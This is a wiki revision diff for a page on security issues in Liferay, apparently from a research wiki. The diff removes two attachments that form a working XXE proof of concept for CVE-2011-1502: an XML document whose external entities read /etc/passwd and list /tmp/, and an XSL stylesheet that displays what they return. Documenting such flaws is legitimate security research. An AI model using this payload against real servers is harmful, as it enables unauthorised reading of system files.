Changes for page Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05
From version Icon 19.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 14:39
Change comment: There is no comment for this version
To version Icon 17.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 14:25
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -24,11 +24,5 @@
24 24  
25 25  * CVE-2011-1502 : allows to read UTF-8 files and to list directories via a XEE (XML External Entity) attack
26 26  
27 -
28 -
29 -
30 -
31 -Reading /etc/passwd using CVE-2011-1502 (cf attached files [[liferay-xee.xsl>>attach:liferay-xee.xsl]] and [[liferay-xee.xml>>attach:liferay-xee.xml]]) :
32 -
33 -
27 +Reading /etc/passwd using CVE-2011-1502 :
34 34  [[image:liferay-read-etc-passwd-via-xee.png||style="display: block; margin-left: auto; margin-right: auto"]]
Icon liferay-xee.xml
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -184 bytes
Content
... ... @@ -1,9 +1,0 @@
1 -<!DOCTYPE doc [
2 -<!ENTITY boom1 SYSTEM "/etc/passwd">
3 -<!ENTITY boom2 SYSTEM "/tmp/">
4 -]>
5 -<doc>
6 -<response><file>&boom1;</file></response>
7 -<response><file>&boom2;</file></response>
8 -</doc>
9 -
Icon liferay-xee.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -319 bytes
Content
... ... @@ -1,12 +1,0 @@
1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
2 -<xsl:template match="/doc">
3 - <html><body>
4 - <xsl:for-each select="response">
5 - <h2>File content :</h2>
6 - <xsl:value-of select="file"/>
7 - <hr/>
8 - </xsl:for-each>
9 - </body></html>
10 -</xsl:template>
11 -</xsl:stylesheet>
12 -